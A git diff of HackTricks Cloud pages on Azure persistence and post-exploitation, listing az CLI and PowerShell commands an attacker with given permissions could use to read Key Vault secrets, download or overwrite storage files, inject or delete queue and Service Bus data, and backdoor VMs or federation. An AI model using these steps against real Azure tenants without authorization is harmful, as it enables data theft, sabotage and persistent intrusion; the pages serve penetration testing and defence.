+++ b/src/pentesting-cloud/azure-security/az-persistence/README.md
@@ -1,19 +1,6 @@
 # Az - Persistence
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ### Illicit Consent Grant
 
@@ -31,21 +18,17 @@ An interesting role to add to the application would be **Privileged authenticati
 
 This technique also allows to **bypass MFA**.
 
-{% code overflow="wrap" %}
 ```powershell
 $passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
 Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
 ```
-{% endcode %}
 
-* For certificate based authentication
+- For certificate based authentication
 
-{% code overflow="wrap" %}
 ```powershell
 Connect-AzAccount -ServicePrincipal -Tenant  -CertificateThumbprint  -ApplicationId 
 ```
-{% endcode %}
 
 ### Federation - Token Signing Certificate
 
@@ -80,19 +63,6 @@ Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http:/
 
 ## References
 
-* [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
+- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
new file mode 100644
index 000000000..cd39ab3bb
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
@@ -0,0 +1,31 @@
+# Az - Queue Storage Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Queue
+
+For more information check:
+
+{{#ref}}
+../az-services/az-queue-enum.md
+{{#endref}}
+
+### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
+
+This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
+
+```bash
+az storage queue create --name  --account-name 
+
+az storage queue metadata update --name  --metadata key1=value1 key2=value2 --account-name 
+
+az storage queue policy set --name  --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name 
+```
+
+## References
+
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
new file mode 100644
index 000000000..ab01d48bf
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
@@ -0,0 +1,41 @@
+# Az - Storage Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Storage Privesc
+
+For more information about storage check:
+
+{{#ref}}
+../az-services/az-storage.md
+{{#endref}}
+
+### Common tricks
+
+- Keep the access keys
+- Generate SAS
+  - User delegated are 7 days max
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
+
+These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
+
+```bash
+az storage account blob-service-properties update \
+  --account-name  \
+  --enable-container-delete-retention true \
+  --container-delete-retention-days 100
+```
+
+### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
+
+These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
+
+```bash
+az storage blob service-properties delete-policy update \
+  --account-name  \
+  --enable true \
+  --days-retained 100
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
new file mode 100644
index 000000000..00cfdd9a4
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
@@ -0,0 +1,25 @@
+# Az - VMs Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## VMs persistence
+
+For more information about VMs check:
+
+{{#ref}}
+../az-services/vms/
+{{#endref}}
+
+### Backdoor VM applications, VM Extensions & Images 
+
+An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
+
+### Backdoor Instances 
+
+An attacker could get access to the instances and backdoor them:
+
+- Using a traditional **rootkit** for example
+- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
+- Backdooring the **User Data**
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md
similarity index 100%
rename from pentesting-cloud/azure-security/az-post-exploitation/README.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/README.md
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
new file mode 100644
index 000000000..4860a9862
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
@@ -0,0 +1,45 @@
+# Az - Blob Storage Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Storage Privesc
+
+For more information about storage check:
+
+{{#ref}}
+../az-services/az-storage.md
+{{#endref}}
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
+
+A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**.
+
+```bash
+# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
+az storage blob list \
+  --account-name  \
+  --container-name  --auth-mode login
+
+az storage blob download \
+  --account-name  \
+  --container-name  \
+  -n file.txt --auth-mode login
+```
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
+
+A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob):
+
+```bash
+# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
+az storage blob upload \
+  --account-name  \
+  --container-name  \
+  --file /tmp/up.txt --auth-mode login --overwrite
+```
+
+### \*/delete
+
+This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
new file mode 100644
index 000000000..04ac0fa8c
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
@@ -0,0 +1,48 @@
+# Az - File Share Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+File Share Post Exploitation
+
+For more information about file shares check:
+
+{{#ref}}
+../az-services/az-file-shares.md
+{{#endref}}
+
+### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read
+
+A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**.
+
+```bash
+# List files inside an azure file share
+az storage file list \
+    --account-name  \
+    --share-name  \
+    --auth-mode login --enable-file-backup-request-intent
+
+# Download an specific file
+az storage file download \
+    --account-name  \
+    --share-name  \
+    --path  \
+    --dest /path/to/down \
+    --auth-mode login --enable-file-backup-request-intent
+```
+
+### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action
+
+A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share):
+
+```bash
+az storage blob upload \
+  --account-name  \
+  --container-name  \
+  --file /tmp/up.txt --auth-mode login --overwrite
+```
+
+### \*/delete
+
+This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
new file mode 100644
index 000000000..d692dbb1a
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
@@ -0,0 +1,17 @@
+# Az - Function Apps Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Funciton Apps Post Exploitaiton
+
+For more information about function apps check:
+
+{{#ref}}
+../az-services/az-function-apps.md
+{{#endref}}
+
+> [!CAUTION] > **Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there:
+
+{{#ref}}
+../az-privilege-escalation/az-functions-app-privesc.md
+{{#endref}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
similarity index 57%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
index 330853723..e353765a6 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
@@ -1,40 +1,25 @@
 # Az - Key Vault Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Azure Key Vault
 
 For more information about this service check:
 
-{% content-ref url="../az-services/keyvault.md" %}
-[keyvault.md](../az-services/keyvault.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/keyvault.md
+{{#endref}}
 
 ### Microsoft.KeyVault/vaults/secrets/getSecret/action
 
 This permission will allow a principal to read the secret value of secrets:
 
-{% code overflow="wrap" %}
 ```bash
 az keyvault secret show --vault-name  --name 
 
 # Get old version secret value
 az keyvault secret show --id https://.vault.azure.net/secrets//
 ```
-{% endcode %}
 
 ### **Microsoft.KeyVault/vaults/certificates/purge/action**
 
@@ -48,7 +33,6 @@ az keyvault certificate purge --vault-name  --name  --name  --algorithm  --value 
 
@@ -56,20 +40,17 @@ az keyvault key encrypt --vault-name  --name  --algorithm
 echo "HackTricks" | base64 # SGFja1RyaWNrcwo=
 az keyvault key encrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value SGFja1RyaWNrcwo=
 ```
-{% endcode %}
 
 ### **Microsoft.KeyVault/vaults/keys/decrypt/action**
 
 This permission allows a principal to decrypt data using a key stored in the vault.
 
-{% code overflow="wrap" %}
 ```bash
 az keyvault key decrypt --vault-name  --name  --algorithm  --value 
 
 # Example
 az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value "ISZ+7dNcDJXLPR5MkdjNvGbtYK3a6Rg0ph/+3g1IoUrCwXnF791xSF0O4rcdVyyBnKRu0cbucqQ/+0fk2QyAZP/aWo/gaxUH55pubS8Zjyw/tBhC5BRJiCtFX4tzUtgTjg8lv3S4SXpYUPxev9t/9UwUixUlJoqu0BgQoXQhyhP7PfgAGsxayyqxQ8EMdkx9DIR/t9jSjv+6q8GW9NFQjOh70FCjEOpYKy9pEGdLtPTrirp3fZXgkYfIIV77TXuHHdR9Z9GG/6ge7xc9XT6X9ciE7nIXNMQGGVCcu3JAn9BZolb3uL7PBCEq+k2rH4tY0jwkxinM45tg38Re2D6CEA==" # This is the result from the previous encryption
 ```
-{% endcode %}
 
 ### **Microsoft.KeyVault/vaults/keys/purge/action**
 
@@ -91,21 +72,17 @@ az keyvault secret purge --vault-name  --name 
 
 This permission allows a principal to create or update a secret in the vault.
 
-{% code overflow="wrap" %}
 ```bash
 az keyvault secret set --vault-name  --name  --value 
 ```
-{% endcode %}
 
 ### **Microsoft.KeyVault/vaults/certificates/delete**
 
 This permission allows a principal to delete a certificate from the vault. The certificate is moved to the "soft-delete" state, where it can be recovered unless purged.
 
-{% code overflow="wrap" %}
 ```bash
 az keyvault certificate delete --vault-name  --name 
 ```
-{% endcode %}
 
 ### **Microsoft.KeyVault/vaults/keys/delete**
 
@@ -131,17 +108,4 @@ This permission allows a principal to restore a secret from a backup.
 az keyvault secret restore --vault-name  --file 
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
similarity index 59%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
index 15a9a939d..f96e47597 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
@@ -1,37 +1,22 @@
 # Az - Queue Storage Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Queue
 
 For more information check:
 
-{% content-ref url="../az-services/az-queue-enum.md" %}
-[az-queue-enum.md](../az-services/az-queue-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-queue-enum.md
+{{#endref}}
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
 
 An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message peek --queue-name  --account-name 
 ```
-{% endcode %}
 
 **Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
 
@@ -39,27 +24,22 @@ az storage message peek --queue-name  --account-name  --account-name 
 ```
-{% endcode %}
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
 
 With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 ```
-{% endcode %}
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
 
 This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 
@@ -71,33 +51,27 @@ az storage message update --queue-name  \
     --visibility-timeout  \
     --account-name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete`
 
 This permission allows an attacker to delete queues within the storage account. By leveraging this capability, an attacker can permanently remove queues and all their associated messages, causing significant disruption to workflows and resulting in critical data loss for applications that rely on the affected queues. This action can also be used to sabotage services by removing essential components of the system.
 
-{% code overflow="wrap" %}
 ```bash
 az storage queue delete --name  --account-name 
 ```
-{% endcode %}
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete`
 
 With this permission, an attacker can clear all messages from an Azure Storage Queue. This action removes all messages, disrupting workflows and causing data loss for systems dependent on the queue.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message clear --queue-name  --account-name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
 
 This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
 
-{% code overflow="wrap" %}
 ```bash
 az storage queue create --name  --account-name 
 
@@ -105,25 +79,11 @@ az storage queue metadata update --name  --metadata key1=value1 key2
 
 az storage queue policy set --name  --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name 
 ```
-{% endcode %}
 
 ## References
 
-* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
-* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
-* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
similarity index 68%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
index f0f7613da..a82d54e24 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
@@ -1,140 +1,99 @@
 # Az - Service Bus Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Service Bus
 
 For more information check:
 
-{% content-ref url="../az-services/az-servicebus-enum.md" %}
-[az-servicebus-enum.md](../az-services/az-servicebus-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-servicebus-enum.md
+{{#endref}}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/Delete`
 
 An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows.
 
-{% code overflow="wrap" %}
 ```bash
 az servicebus namespace delete --resource-group  --name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete`
 
 An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic.
 
-{% code overflow="wrap" %}
 ```bash
 az servicebus topic delete --resource-group  --namespace-name  --name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/queues/Delete`
 
 An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue.
 
-{% code overflow="wrap" %}
 ```bash
 az servicebus queue delete --resource-group  --namespace-name  --name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete`
 
 An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription.
 
-{% code overflow="wrap" %}
 ```bash
 az servicebus topic subscription delete --resource-group  --namespace-name  --topic-name  --name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read`
 
 An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk.
 
-{% code overflow="wrap" %}
 ```bash
-az servicebus namespace create --resource-group  --name  --location  
+az servicebus namespace create --resource-group  --name  --location 
 az servicebus namespace update --resource-group  --name  --tags 
 ```
-{% endcode %}
-
 
 ### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`)
 
 An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:`Microsoft.ServiceBus/namespaces/queues/read`) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk.
 
-{% code overflow="wrap" %}
 ```bash
-az servicebus queue create --resource-group  --namespace-name  --name  
+az servicebus queue create --resource-group  --namespace-name  --name 
 az servicebus queue update --resource-group  --namespace-name  --name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`)
 
 An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:`Microsoft.ServiceBus/namespaces/topics/read`) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation.
 
-{% code overflow="wrap" %}
 ```bash
 az servicebus topic create --resource-group  --namespace-name  --name 
 az servicebus topic update --resource-group  --namespace-name  --name 
 ```
-{% endcode %}
 
 ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`)
 
 An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios.
 
-
-{% code overflow="wrap" %}
 ```bash
 az servicebus topic subscription create --resource-group  --namespace-name  --topic-name  --name 
 az servicebus topic subscription update --resource-group  --namespace-name  --topic-name  --name 
 ```
-{% endcode %}
-
 
 ### Actions: `AuthorizationRules` Send & Recive Messages
 
 Take a look here:
 
-{% content-ref url="../az-services/az-queue-privesc.md" %}
-[az-queue-privesc.md](../az-services/az-queue-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-queue-privesc.md
+{{#endref}}
 
 ## References
 
-* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
-* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
-* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
-* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
-* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
-* https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest
-* https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
+- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
+- https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest
+- https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
